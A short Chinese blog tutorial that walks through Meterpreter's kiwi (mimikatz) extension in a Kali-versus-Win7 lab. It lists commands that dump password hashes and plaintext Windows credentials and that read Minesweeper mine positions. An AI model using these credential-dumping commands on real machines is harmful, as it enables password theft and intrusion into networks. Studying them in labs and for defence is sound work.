当前位置:   article > 正文

利用mimikatz插件获取内网相关信息_mimikatz 获取3389远程连接记录

mimikatz 获取3389远程连接记录

你宁愿错过也不愿意主动是吗。。。。

----  网易云热评

 

环境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.137

 

一、生成木马及监听主机参考上篇文章:

 

二、利用mimikatz获取内网相关信息

1、加载mimikatz

meterpreter > load kiwi

2、查看帮助信息

meterpreter > help kiwi

3、获取用户的hash

meterpreter > creds_msv

4、获取明文密码

meterpreter > creds_wdigest

 

5、查看当前主机运行的进程

meterpreter > kiwi_cmd process::list

 

三、获取扫雷小游戏的地雷位置

1、在小受上运行扫雷

 

2、在小攻上运行下面命令即可获取地雷位置

meterpreter > kiwi_cmd minesweeper::infos

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/456781
推荐阅读
相关标签
  

闽ICP备14008679号